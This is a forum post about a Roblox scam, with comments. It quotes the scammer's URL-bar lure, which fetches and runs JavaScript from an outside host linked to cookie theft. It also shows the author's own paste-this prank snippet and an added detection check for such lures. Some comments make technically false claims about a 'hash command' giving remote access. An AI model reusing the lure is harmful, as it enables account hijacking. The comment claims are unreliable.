Getting revenge on a Roblox hacker
SixBeeps (5219)

(This post contains malicious JS code! Only run things if you absolutely know what it does!)

I was just browsing Roblox one day when I got the following message from a user I'd never seen before:

Already, I knew this was a scam of some sort. But, I followed the YT link out of curiosity. On there, it tells you to paste something into the URL bar:

+javascript:$.get('//rblx.link:3000/1')

With my limited knowledge of JS, I managed to figure out what this code did.

  • javascript:: This stuff should be run as JS code
  • $.get: Using jQuery (I'm assuming) call an HTTP GET request
  • //rblx.link:3000/1: Some kind of link (this will be important)

So, it GETs some data from rblx.link and runs it as JS. But what is this link? I followed it, and all it did was show some code:

// Avatar Texture Downloader script
// @WebGL3D
// 2020-06-04

// Chain of requests that allows us to get the texture hash
var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid"))).json()).Url)).json()).textures[0]

// Calculate ID of CDN from hash
for (var i = 31, t = 0; t < 32; t++)
	i ^= hash[t].charCodeAt(0);

// Redirect to avatar texture url
location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash

On its own, this doesn't look like anything malicious. However, it was revealed that somehow there was a cookie logger associated with the link. I'm not entirely sure how this logger works or where it is, but many people reported that after using this code, their accounts were hacked and replaced with Trump 2020 stuff. I'll admit, I had also found my account like this a week ago, but I never ran the code. Strange, innit?

Anyways, I wanted to get some harmless revenge on whoever did this. I decided to create something similar to the JS that was posted, but make it not track your cookies. I made the Repl below, then posted this comment on the video:

If you run my snippet (It's safe, don't worry!) you can see what it does for yourself :)
Just paste the contents below into the URL bar and remove the + sign. This must be done on a site, not on a new tab.

+javascript:location.href="//rbxavatar--sixbeeps.repl.co"
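
The post's breakdown of the javascript: lure, turned into a moderation check. This is an added example, not part of the original post: it flags pasted text whose javascript: URL loads from or navigates to a host outside an assumed first-party list. The names analyzeLure, FIRST_PARTY and the verdict strings are hypothetical.

```javascript
// Added example: triage pasted text for "run this in the URL bar" lures.
// FIRST_PARTY is an assumed allowlist built from hosts the decoy script touches.
const FIRST_PARTY = ["roblox.com", "rbxcdn.com"];

// Constructs that pull in or hand control to remote content.
const LOADERS = [
  ["jquery-request", /\$\.(?:get|getScript|ajax)\s*\(/i],
  ["fetch", /\bfetch\s*\(/i],
  ["dynamic-import", /\bimport\s*\(/i],
  ["eval", /\beval\s*\(/i],
  ["navigation", /\blocation(?:\.href)?\s*=/i],
];

function isFirstParty(host) {
  return FIRST_PARTY.some((d) => host === d || host.endsWith("." + d));
}

function analyzeLure(text) {
  // The lures on this page carry a leading "+" the reader is told to delete,
  // so accept "+", quotes or whitespace in front of the scheme.
  const m = /(?:^|[\s+"'(])javascript\s*:\s*(.+)$/im.exec(text);
  if (!m) return { verdict: "allow", loaders: [], remoteHosts: [] };

  const body = m[1];
  const loaders = LOADERS.filter(([, re]) => re.test(body)).map(([name]) => name);

  // Absolute and protocol-relative ("//host:port/path") references.
  const hosts = [...body.matchAll(/(?:https?:)?\/\/([a-z0-9.-]+)(?::\d+)?/gi)]
    .map((h) => h[1].toLowerCase());
  const remoteHosts = [...new Set(hosts)].filter((h) => !isFirstParty(h));

  // A javascript: URL that loads or navigates to a third-party host is blocked;
  // the scheme alone (e.g. prose mentioning "javascript:") goes to review.
  const verdict = loaders.length && remoteHosts.length ? "block" : "review";
  return { verdict, loaders, remoteHosts };
}

// The two snippets quoted in the post, plus two constructed messages.
const samples = [
  "+javascript:$.get('//rblx.link:3000/1')",
  '+javascript:location.href="//rbxavatar--sixbeeps.repl.co"',
  "I am learning javascript: any tips?",     // constructed
  "Event page: https://www.roblox.com/home", // constructed
];
for (const s of samples) console.log(analyzeLure(s).verdict, "<-", s);
```

Both snippets from the post come back as block: the check sees only that the URL hands control to a third-party host, not whether the destination is a prank.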

Comments
Jasperscode (14)

Dude, you have no F*cking Idea what that thing does. I found a Minecraft hacked client that was proven to have a hidden backdoor and I know what it does.

Jasperscode (14)

@Jasperscode That "scam" is using the HASH Command to give the "scammer" remote access to your computer via asking for the texture and then when the computer is getting the files it loads a virus that gives the hacker full control over anything on the computer.

SixBeeps (5219)

@Jasperscode Uhh, the hash command is supposed to keep a hash table of programs and is only on Linux. How would it be used to access things on a Windows machine? And how would that GET request to the texture call that command?

Jasperscode (14)

@SixBeeps The hash command will work on Windows if the program is running

Jasperscode (14)

@Jasperscode it is just less effective

SixBeeps (5219)

@Jasperscode Does it set up something like a VM? Is it some kind of weird port of the program? I don't see how a Unix command that is meant to run in a Unix ecosystem runs on something completely different like Windows.

Jasperscode (14)

@SixBeeps More or less it makes some kind of proxy that connects the files through a VM yes

programmeruser (596)

(sorry for necroposting) If you want to know more about this scam I found this blog post: https://petabyte.heb12.com/blog/?post=27

YPD (1)

BEST. ROLL. EVER.

ZeeMan (8)

Also, real haxxors could steal ur info

ZeeMan (8)

Don't work for me

DynamicSquid (4899)

Damn, those ads really ruin it